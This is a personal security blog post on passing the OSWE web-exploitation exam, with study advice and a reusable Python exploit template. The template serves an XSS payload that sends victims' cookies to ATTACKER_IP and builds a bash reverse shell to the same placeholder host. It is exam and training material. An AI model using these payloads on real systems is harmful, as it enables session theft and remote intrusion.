<!DOCTYPE html>
<html>
<head>
  <meta charset="utf-8">
  <title>How I Passed the OSWE Exam in Under 2 Months | Tanknight</title>
  <meta name="keywords" content="">
  <meta name="description" content="How I Passed the OSWE Exam in Under 2 Months | Tanknight">
    <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">
<meta name="description" content="A personal blog by Tanknight documenting bug bounty hunting, penetration testing, CTF writeups, vulnerability research, web application security, and technical knowledge sharing.">
<meta property="og:type" content="website">
<meta property="og:title" content="Tags">
<meta property="og:url" content="http://tanknight.blog/tags/index.html">
<meta property="og:site_name" content="Tanknight">
<meta property="og:description" content="A personal blog by Tanknight documenting bug bounty hunting, penetration testing, CTF writeups, vulnerability research, web application security, and technical knowledge sharing.">
<meta property="og:locale" content="en_US">
<meta property="article:published_time" content="2026-07-13T13:35:54.000Z">
<meta property="article:modified_time" content="2026-07-13T13:36:12.000Z">
<meta property="article:author" content="Tanknight">
<meta property="article:tag" content="CTF">
<meta property="article:tag" content="Linux">
<meta property="article:tag" content="bug bounty">
<meta property="article:tag" content="bug bounty hunting">
<meta property="article:tag" content="cybersecurity">
<meta property="article:tag" content="digital forensics">
<meta property="article:tag" content="ethical hacking">
<meta property="article:tag" content="exploit development">
<meta property="article:tag" content="knowledge sharing">
<meta property="article:tag" content="penetration testing">
<meta property="article:tag" content="programming">
<meta property="article:tag" content="reverse engineering">
<meta property="article:tag" content="vulnerability disclosure">
<meta property="article:tag" content="vulnerability research">
<meta property="article:tag" content="web security">
<meta property="article:tag" content="writeups">
<meta name="twitter:card" content="summary">


<link rel="icon" href="/img/avatar.jpg">

<link href="/css/style.css?v=1.1.0" rel="stylesheet">

<link href="/css/hl_theme/atom-dark.css?v=1.1.0" rel="stylesheet">

<link href="//cdn.jsdelivr.net/npm/animate.css@4.1.0/animate.min.css" rel="stylesheet">

<script src="//cdn.jsdelivr.net/npm/jquery@3.5.1/dist/jquery.min.js"></script>
<script src="/js/titleTip.js?v=1.1.0" ></script>

<script src="//cdn.jsdelivr.net/npm/highlightjs@9.16.2/highlight.pack.min.js"></script>
<script>
    hljs.initHighlightingOnLoad();
</script>

<script src="//cdn.jsdelivr.net/npm/nprogress@0.2.0/nprogress.min.js"></script>



<script src="/js/iconfont.js?v=1.1.0" ></script>

<meta name="generator" content="Hexo 8.1.2">
<style>.github-emoji { position: relative; display: inline-block; width: 1.2em; min-height: 1.2em; overflow: hidden; vertical-align: top; color: transparent; }  .github-emoji > span { position: relative; z-index: 10; }  .github-emoji img, .github-emoji .fancybox { margin: 0 !important; padding: 0 !important; border: none !important; outline: none !important; text-decoration: none !important; user-select: none !important; cursor: auto !important; }  .github-emoji img { height: 1.2em !important; width: 1.2em !important; position: absolute !important; left: 50% !important; top: 50% !important; transform: translate(-50%, -50%) !important; user-select: none !important; cursor: auto !important; } .github-emoji-fallback { color: inherit; } .github-emoji-fallback img { opacity: 0 !important; }</style>
<link rel="alternate" href="/atom.xml" title="Tanknight" type="application/atom+xml">
</head>
<div style="display: none">
  <input class="theme_disqus_on" value="false">
  <input class="theme_preload_comment" value="">
  <input class="theme_blog_path" value="">
  <input id="theme_shortcut" value="true" />
  <input id="theme_highlight_on" value="true" />
  <input id="theme_code_copy" value="true" />
</div>



<body>
<aside class="nav">
    <div class="nav-left">
        <a href="/"
   class="avatar_target">
    <img class="avatar"
         src="/img/avatar.jpg"/>
</a>
<div class="author">
    <span>Tanknight</span>
</div>

<div class="icon">
    
        
    
        
            <a title="github"
               href="https://github.com/TanKnight7"
               target="_blank">
                
                    <svg class="iconfont-svg" aria-hidden="true">
                        <use xlink:href="#icon-github"></use>
                    </svg>
                
            </a>
        
    
        
    
        
    
        
            <a title="linkedin"
               href="https://www.linkedin.com/in/michael-stevanus-tanoto/"
               target="_blank">
                
                    <svg class="iconfont-svg" aria-hidden="true">
                        <use xlink:href="#icon-linkedin"></use>
                    </svg>
                
            </a>
        
    
        
    
        
    
        
    
        
    
        
    
        
    
        
    
        
    
        
    
        
    
        
    
        
    
</div>





<ul>
    <li>
        <div class="all active" data-rel="All">All
            
        </div>
    </li>
    
        
            
                
    <li>
        <div data-rel="bugbounties">
            
            bugbounties
            
        </div>
        
    </li>

            
        
    
        
            
                
    <li>
        <div data-rel="personal">
            
            personal
            
        </div>
        
    </li>

            
        
    
        
            
                
    <li>
        <div data-rel="writeups">
            
            writeups
            
        </div>
        
    </li>

            
        
    
</ul>
<div class="left-bottom">
    <div class="menus">
        
            
            
            
    </div>
    <div>
        
        
    </div>
</div>
<input type="hidden" id="yelog_site_posts_number" value="9">
<input type="hidden" id="yelog_site_word_count" value="12.2k">
<div style="display: none">
    <span id="busuanzi_value_site_uv"></span>
    <span id="busuanzi_value_site_pv"></span>
</div>

    </div>
    <div class="nav-right">
        <div class="friends-area">
    <div class="friends-title">
        Links
        <i class="iconfont icon-left"></i>
    </div>
    <div class="friends-content">
        <ul>
            
            <li><a target="_blank" href="http://yelog.org/">叶落阁</a></li>
            
        </ul>
    </div>
</div>
        <div class="title-list">
    <div class="right-top">
        <div id="default-panel">
            <i class="iconfont icon-search" data-title="search shortcut key i"></i>
            <div class="right-title">All</div>
            <i class="iconfont icon-file-tree" data-title="switch to outline view shortcut key w"></i>
        </div>
        <div id="search-panel">
            <i class="iconfont icon-left" data-title="return"></i>
            <input id="local-search-input" autocomplete="off"/>
            <label class="border-line" for="input"></label>
            <i class="iconfont icon-case-sensitive" data-title="case sensitive"></i>
            <i class="iconfont icon-tag" data-title="label"></i>
        </div>
        <div id="outline-panel" style="display: none">
            <div class="right-title">outline</div>
            <i class="iconfont icon-list" data-title="switch to article list"></i>
        </div>
    </div>

    <div class="tags-list">
    <input id="tag-search" />
    <div class="tag-wrapper">
        
            <li class="article-tag-list-item">
                <i class="iconfont icon-tag"></i><a>arbitrary-file-read</a>
            </li>
        
            <li class="article-tag-list-item">
                <i class="iconfont icon-tag"></i><a>command-injection</a>
            </li>
        
            <li class="article-tag-list-item">
                <i class="iconfont icon-tag"></i><a>csp-bypass</a>
            </li>
        
            <li class="article-tag-list-item">
                <i class="iconfont icon-tag"></i><a>css-injection</a>
            </li>
        
            <li class="article-tag-list-item">
                <i class="iconfont icon-tag"></i><a>django-ssti</a>
            </li>
        
            <li class="article-tag-list-item">
                <i class="iconfont icon-tag"></i><a>dom-clobeering</a>
            </li>
        
            <li class="article-tag-list-item">
                <i class="iconfont icon-tag"></i><a>dompurify-bypass</a>
            </li>
        
            <li class="article-tag-list-item">
                <i class="iconfont icon-tag"></i><a>grpc-hacking</a>
            </li>
        
            <li class="article-tag-list-item">
                <i class="iconfont icon-tag"></i><a>idor</a>
            </li>
        
            <li class="article-tag-list-item">
                <i class="iconfont icon-tag"></i><a>iframe-sandbox-bypass</a>
            </li>
        
            <li class="article-tag-list-item">
                <i class="iconfont icon-tag"></i><a>mass-assignment</a>
            </li>
        
            <li class="article-tag-list-item">
                <i class="iconfont icon-tag"></i><a>nginx-misconfig</a>
            </li>
        
            <li class="article-tag-list-item">
                <i class="iconfont icon-tag"></i><a>parser-discrepancies</a>
            </li>
        
            <li class="article-tag-list-item">
                <i class="iconfont icon-tag"></i><a>path-traversal</a>
            </li>
        
            <li class="article-tag-list-item">
                <i class="iconfont icon-tag"></i><a>prototype-pollution</a>
            </li>
        
            <li class="article-tag-list-item">
                <i class="iconfont icon-tag"></i><a>pug-ssti</a>
            </li>
        
            <li class="article-tag-list-item">
                <i class="iconfont icon-tag"></i><a>sandbox-escape</a>
            </li>
        
            <li class="article-tag-list-item">
                <i class="iconfont icon-tag"></i><a>sqli</a>
            </li>
        
            <li class="article-tag-list-item">
                <i class="iconfont icon-tag"></i><a>ssrf</a>
            </li>
        
            <li class="article-tag-list-item">
                <i class="iconfont icon-tag"></i><a>unicode-bypass</a>
            </li>
        
            <li class="article-tag-list-item">
                <i class="iconfont icon-tag"></i><a>wordpress</a>
            </li>
        
            <li class="article-tag-list-item">
                <i class="iconfont icon-tag"></i><a>xss</a>
            </li>
        
    </div>

</div>

    
    <div id="local-search-result">

    </div>
    
    <nav id="title-list-nav">
        
        
        <a  class="All writeups "
           href="/2026/07/16/Gemastik-CTF-2025-Writeup/"
           data-tag="xss,csp-bypass,grpc-hacking,command-injection,sqli,django-ssti"
           data-author="" >
            <span class="post-title" title="Gemastik CTF 2025 Writeup">Gemastik CTF 2025 Writeup</span>
            <span class="post-date" title="2026-07-16 19:17:41">2026/07/16</span>
        </a>
        
        
        <a  class="All writeups "
           href="/2026/07/16/Ara-CTF-2025-Writeup/"
           data-tag="pug-ssti,unicode-bypass"
           data-author="" >
            <span class="post-title" title="Ara CTF 2025 Writeup">Ara CTF 2025 Writeup</span>
            <span class="post-date" title="2026-07-16 08:51:35">2026/07/16</span>
        </a>
        
        
        <a  class="All writeups "
           href="/2026/07/16/Hack-Today-CTF-2025-Writeup/"
           data-tag="django-ssti,ssrf,arbitrary-file-read"
           data-author="" >
            <span class="post-title" title="Hack Today CTF 2025 Writeup">Hack Today CTF 2025 Writeup</span>
            <span class="post-date" title="2026-07-16 07:37:35">2026/07/16</span>
        </a>
        
        
        <a  class="All writeups "
           href="/2026/07/16/Cyber-Jawara-CTF-2025-Writeup/"
           data-tag="css-injection,idor,xss,csp-bypass,prototype-pollution,iframe-sandbox-bypass,dom-clobeering,dompurify-bypass"
           data-author="" >
            <span class="post-title" title="Cyber Jawara CTF 2025 Writeup">Cyber Jawara CTF 2025 Writeup</span>
            <span class="post-date" title="2026-07-16 06:51:19">2026/07/16</span>
        </a>
        
        
        <a  class="All personal "
           href="/2026/07/15/How-Cybersecurity-Changed-My-Life/"
           data-tag=""
           data-author="" >
            <span class="post-title" title="How Cybersecurity Changed My Life">How Cybersecurity Changed My Life</span>
            <span class="post-date" title="2026-07-15 12:02:02">2026/07/15</span>
        </a>
        
        
        <a  class="All writeups "
           href="/2026/07/14/SCHEMATICSCTF-2025-Writeup/"
           data-tag="command-injection,sandbox-escape,wordpress"
           data-author="" >
            <span class="post-title" title="Schematics CTF 2025 Writeup">Schematics CTF 2025 Writeup</span>
            <span class="post-date" title="2026-07-14 22:07:50">2026/07/14</span>
        </a>
        
        
        <a  class="All personal "
           href="/2026/07/14/How-I-Passed-the-OSWE-Exam-in-Under-2-Months/"
           data-tag=""
           data-author="" >
            <span class="post-title" title="How I Passed the OSWE Exam in Under 2 Months">How I Passed the OSWE Exam in Under 2 Months</span>
            <span class="post-date" title="2026-07-14 19:12:05">2026/07/14</span>
        </a>
        
        
        <a  class="All bugbounties "
           href="/2026/07/14/How-I-Got-Three-Nasa-Certificates-Article/"
           data-tag="xss"
           data-author="" >
            <span class="post-title" title="How I Discovered Three Reflected XSS Vulnerabilities and Earned a Spot in NASA’s Hall of Fame">How I Discovered Three Reflected XSS Vulnerabilities and Earned a Spot in NASA’s Hall of Fame</span>
            <span class="post-date" title="2026-07-14 03:57:33">2026/07/14</span>
        </a>
        
        
        <a  class="All writeups "
           href="/2026/07/13/IFEST-2025-CTF-Writeup/"
           data-tag="command-injection,django-ssti,ssrf,mass-assignment,nginx-misconfig,parser-discrepancies,path-traversal"
           data-author="" >
            <span class="post-title" title="IFEST CTF 2025 Writeup">IFEST CTF 2025 Writeup</span>
            <span class="post-date" title="2026-07-13 22:01:00">2026/07/13</span>
        </a>
        
        <div id="no-item-tips">

        </div>
    </nav>
    <div id="outline-list">
    </div>
</div>

    </div>
    <div class="hide-list">
        <div class="semicircle" data-title="Toggle full screen shortcut key s">
            <div class="brackets first"><</div>
            <div class="brackets">&gt;</div>
        </div>
    </div>
</aside>
<div id="post">
    <div class="pjax">
        <article id="post-How-I-Passed-the-OSWE-Exam-in-Under-2-Months" class="article article-type-post" itemscope itemprop="blogPost">
    
        <h1 class="article-title">How I Passed the OSWE Exam in Under 2 Months</h1>
    
    <div class="article-meta">
        
        
        
        <span class="book">
            <i class="iconfont icon-category"></i>
            
            
            <a  data-rel="personal">personal</a>
            
        </span>
        
        
    </div>
    <div class="article-meta">
        
            Created At : <time class="date" title='Updated At: 2026-07-16 08:08:50'>2026-07-14 19:12</time>
        
    </div>
    <div class="article-meta">
        
        <span>Count:1k</span>
        
        
        <span id="busuanzi_container_page_pv">
            Views 👀 :<span id="busuanzi_value_page_pv">
                <span class="count-comment">
                    <span class="spinner">
                      <div class="cube1"></div>
                      <div class="cube2"></div>
                    </span>
                </span>
            </span>
        </span>
        
        
    </div>
    
    <div class="toc-ref">
    
        <ol class="toc"><li class="toc-item toc-level-1"><a class="toc-link" href="#Is-the-OSWE-Exam-Easy"><span class="toc-text">Is the OSWE Exam Easy?</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#Is-Studying-Only-the-WEB-300-Course-Enough"><span class="toc-text">Is Studying Only the WEB-300 Course Enough?</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#My-Preparation-Methodology"><span class="toc-text">My Preparation Methodology</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#Thank-You"><span class="toc-text">Thank You</span></a></li></ol>
    
<style>
    .left-col .switch-btn,
    .left-col .switch-area {
        display: none;
    }
    .toc-level-3 i,
    .toc-level-3 ol {
        display: none !important;
    }
</style>
</div>
    
    <div class="article-entry" itemprop="articleBody">
      
        <h1 id="Is-the-OSWE-Exam-Easy"><a href="#Is-the-OSWE-Exam-Easy" class="headerlink" title="Is the OSWE Exam Easy?"></a>Is the OSWE Exam Easy?</h1><p>Before I explain my preparation methodology, I want to answer one of the questions I get asked the most: <strong>Is the OSWE exam easy?</strong></p>
<p>I’ve seen many people say that the OSWE exam is easy, but I don’t completely agree with that. In my opinion, whether the exam is easy or difficult depends on your background and experience.</p>
<p>For me, most of the skills tested in OSWE were things I had already learned from playing Capture The Flag (CTF) competitions, especially web exploitation challenges. Because of that, I was already used to reading source code, understanding how web applications work, and finding vulnerabilities.</p>
<p>Another thing that helped me a lot was writing an exploit script for every web challenge I solved. Instead of exploiting a challenge manually, I always tried to automate it. This habit became really useful during the OSWE exam because I was already comfortable writing exploit scripts under time pressure.</p>
<h1 id="Is-Studying-Only-the-WEB-300-Course-Enough"><a href="#Is-Studying-Only-the-WEB-300-Course-Enough" class="headerlink" title="Is Studying Only the WEB-300 Course Enough?"></a>Is Studying Only the WEB-300 Course Enough?</h1><p>In my opinion, <strong>yes</strong>. I think it’s possible to pass the OSWE exam by only studying the official WEB-300 course provided by OffSec.</p>
<p>However, I still recommend practicing outside of the course. Playing CTFs, especially web exploitation challenges, gives you experience with different types of vulnerabilities and coding styles. This extra practice makes it easier to analyze unfamiliar applications during the exam.</p>
<h1 id="My-Preparation-Methodology"><a href="#My-Preparation-Methodology" class="headerlink" title="My Preparation Methodology"></a>My Preparation Methodology</h1><ol>
<li><p><strong>Played web exploitation CTFs for around 1–2 years.</strong><br> Every time I solved a challenge, I wrote an exploit script instead of doing everything manually. This habit helped me a lot during the exam.</p>
</li>
<li><p><strong>Read and studied the entire WEB-300 course.</strong><br> I didn’t just follow the labs, I tried to understand why each vulnerability existed and how the exploit worked.</p>
</li>
<li><p><strong>Completed all seven challenge labs.</strong><br>  This was very useful because the challenge labs use the same environment and setup as the actual OSWE exam.</p>
</li>
<li><p><strong>Created an exploit script for every challenge lab.</strong><br> I treated every lab like a real exam machine and automated the exploitation process as much as possible.</p>
</li>
<li><p><strong>Built my own exploit template.</strong><br> Instead of writing the same code every time, I created a reusable Python template with features like:</p>
<ul>
<li>Argument parsing</li>
<li>Burp Suite proxy support (<code>--proxy</code>)</li>
<li>Debug mode support</li>
<li>A built-in Flask HTTP server</li>
<li>Automatic reverse shell listener</li>
<li>Interactive shell handling</li>
<li>Helper functions for common tasks</li>
</ul>
<p> Having this template saved me a lot of time because I could focus on finding the vulnerability instead of rewriting boilerplate code.</p>
</li>
</ol>
<pre><code class="language-python">import requests
from argparse import ArgumentParser
import urllib3
import re
from pwn import listen
import time
from flask import Flask, make_response, request
import threading
import time
import random
import string
import json
from bs4 import BeautifulSoup
from tqdm import tqdm
import io

#=== GLOBAL VAR ===#
ATTACKER_IP = ""
ATTACKER_HTTP_PORT = "9999"

VICTIM_URL = ""
VICTIM_DEBUG_URL = ""

x = requests.Session()
x.verify = False

urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
#=== GLOBAL VAR ===#
#=== TEMPLATE FUNCTIONS ===#
def run_argument_parser():
    parser = ArgumentParser()
    parser.add_argument('--debug', action="store_true", help='Attack Debug Machine')
    parser.add_argument('--proxy', action="store_true", help='Proxy HTTP/s request to burpsuite')

    args = parser.parse_args()
    if args.debug:
        global VICTIM_URL
        VICTIM_URL = VICTIM_DEBUG_URL

    if args.proxy:
        x.proxies.update({
                'http':"http://127.0.0.1:8080",
                'https':"http://127.0.0.1:8080"
            })

def generate_random_string(k=8):
    return ''.join(random.choices(string.ascii_letters, k=k))

def start_http_server():
    app = Flask(__name__)

    @app.route('/', methods=['GET','POST'])
    def home():
        return 'nice'
    
    @app.route('/js', methods=['GET','POST'])
    def js():
        XSS = """
fetch(`http://ATTACKER_IP:ATTACKER_HTTP_PORT/extract?cookie=${encodeURI(document.cookie)}`)
""".replace("ATTACKER_IP", ATTACKER_IP).replace('ATTACKER_HTTP_PORT', ATTACKER_HTTP_PORT).strip()
        
        response = make_response(XSS)
        response.headers.add("Access-Control-Allow-Origin", "*")
        response.headers.add("Access-Control-Allow-Headers", "Content-Type,Authorization")
        response.headers.add("Access-Control-Allow-Methods", "GET,PUT,POST,DELETE,OPTIONS")
    
        return response
    
    threading.Thread(target=app.run, args=('0.0.0.0',ATTACKER_HTTP_PORT,), daemon=True).start()
    time.sleep(3)

def start_listener(base_fn):
    def enhanced_fn(*args, **kwargs):
        io = listen()
        base_fn(io, *args, **kwargs)
        io.sendline(b'echo -n "The root flag: " &amp;&amp; cat proof.txt')
        io.interactive()
    return enhanced_fn
#=== TEMPLATE FUNCTIONS ===#


#====== WRITE EXPLOIT SCRIPT HERE

@start_listener
def exploit_trigger_rce(io):
    REVSHELL_PAYLOAD = f"bash -c 'bash -i &gt;&amp; /dev/tcp/{ATTACKER_IP}/{io.lport} 0&gt;&amp;1'"

if __name__ == "__main__":
    run_argument_parser()
</code></pre>
<ol start="6">
<li><p><strong>Regex Pattern Searching</strong><br> Since OSWE is a white-box assessment, you’ll often have to review a large amount of source code, which can quickly become overwhelming. To make the process more efficient, I prepared a set of regex patterns to search for potentially dangerous functions such as <code>eval</code>, <code>shell_exec</code>, <code>exec</code>, <code>system</code>, and other common vulnerability sinks. This helped me quickly identify areas of the codebase that deserved a closer look instead of reading every file line by line.</p>
<p> <strong>Reference:</strong> <a target="_blank" rel="noopener" href="https://notes.awfulsecurity.org/oswe/oswe-code-review-cheat-sheet/vscode-sinks">https://notes.awfulsecurity.org/oswe/oswe-code-review-cheat-sheet/vscode-sinks</a></p>
</li>
<li><p><strong>VS Code Debugging</strong><br> The OSWE exam provides a dedicated debug machine. Although you’re not allowed to download the source code, OffSec provides a web-based VS Code instance that lets you browse and debug the application directly from the debug machine.</p>
<p> One feature I found especially useful was the built-in debugger. By setting breakpoints and stepping through the code, I could trace the application’s execution flow, inspect variables, and better understand how different parts of the application worked. This made it much easier to identify vulnerabilities and verify my assumptions during testing.</p>
<p> I highly recommend taking advantage of this feature during the exam, as it can save a significant amount of time when analyzing complex applications.</p>
</li>
<li><p><strong>Alternative Way of Debugging</strong><br> Sometimes you’ll come across a custom function implemented by the application, and it may not be immediately clear what it does just by reading the source code. In these cases, I found it helpful to copy the function into an interactive interpreter, such as <code>php -a</code>, <code>jshell</code>, <code>node</code>, or the Python and experiment with it using different inputs.</p>
<p> Running the function in isolation lets you observe its behavior, understand its logic, and quickly verify assumptions without repeatedly interacting with the web application. This can be a fast and effective way to understand unfamiliar code during the exam.</p>
</li>
</ol>
<h1 id="Thank-You"><a href="#Thank-You" class="headerlink" title="Thank You"></a>Thank You</h1><p>I hope this article gives you a better idea of how I prepared for OSWE. Good luck with your preparation, and I hope to see you earn your OSWE certification soon!</p>

      
       <hr><span style="font-style: italic;color: gray;"> Please cite the source when reposting. Readers are welcome to verify the references cited in the article and point out any errors or unclear expressions. </span>
    </div>
</article>





    <div id="comments">
    <script>
        {
            const comments = document.getElementById("comments");
            const script = document.createElement("script");
            script.src = "https://giscus.app/client.js";
            script.setAttribute('data-repo', "TanKnight7/TanKnight7.github.io");
            script.setAttribute('data-repo-id', "R_kgDOOxOm1A");
            script.setAttribute('data-category', "General");
            script.setAttribute('data-category-id', "DIC_kwDOOxOm1M4DBH1f");
            script.setAttribute('data-mapping', "pathname");
            script.setAttribute('data-strict', "0");
            script.setAttribute('data-reactions-enabled', "1");
            script.setAttribute('data-emit-metadata', "1");
            script.setAttribute('data-input-position', "top");
            script.setAttribute('data-theme', "light");
            script.setAttribute('data-lang', "en");
            script.setAttribute('data-loading', "lazy");
            script.setAttribute('crossorigin', "anonymous");
            script.setAttribute('async', "");
            comments.appendChild(script);
        }
    </script>
</div>



    




    </div>
    <div class="copyright">
        <p class="footer-entry">
    ©2026 Tanknight
</p>
<p class="footer-entry">Built with <a href="https://hexo.io/" target="_blank">Hexo</a> and <a href="https://github.com/yelog/hexo-theme-3-hexo" target="_blank">3-hexo</a> theme</p>

    </div>
    <div class="full-toc">
        <button class="full" data-title="Toggle full screen shortcut key s"><span class="min "></span></button>
<a class="" id="rocket" ></a>

    </div>
</div>

</body>
<script src="/js/jquery.pjax.js?v=1.1.0" ></script>

<script src="/js/script.js?v=1.1.0" ></script>
<script>
    var img_resize = 'default';
    function initArticle() {
        /*渲染对应的表格样式*/
        
            $("#post .pjax table").addClass("green_title");
        

        /*渲染打赏样式*/
        

        /*高亮代码块行号*/
        

        /*访问数量*/
        
        $.getScript("//busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js");
        

        /*代码高亮，行号对齐*/
        $('.pre-numbering').css('line-height',$('.has-numbering').css('line-height'));

        
        
    }

    /*打赏页面隐藏与展示*/
    

</script>

<!--加入行号的高亮代码块样式-->

<!--自定义样式设置-->
<style>
    
    
    .nav {
        width: 542px;
    }
    .nav.fullscreen {
        margin-left: -542px;
    }
    .nav-left {
        width: 120px;
    }
    
    
    @media screen and (max-width: 1468px) {
        .nav {
            width: 492px;
        }
        .nav.fullscreen {
            margin-left: -492px;
        }
        .nav-left {
            width: 100px;
        }
    }
    
    
    @media screen and (max-width: 1024px) {
        .nav {
            width: 492px;
            margin-left: -492px
        }
        .nav.fullscreen {
            margin-left: 0;
        }
    }
    
    @media screen and (max-width: 426px) {
        .nav {
            width: 100%;
        }
        .nav-left {
            width: 100%;
        }
    }
    
    
    .nav-right .title-list nav a .post-title, .nav-right .title-list #local-search-result a .post-title {
        color: #383636;
    }
    
    
    .nav-right .title-list nav a .post-date, .nav-right .title-list #local-search-result a .post-date {
        color: #5e5e5f;
    }
    
    
    .nav-right nav a.hover, #local-search-result a.hover{
        background-color: #e2e0e0;
    }
    
    

    /*列表样式*/
    

    /* 背景图样式 */
    
    


    /*引用块样式*/
    

    /*文章列表背景图*/
    

    
</style>







</html>
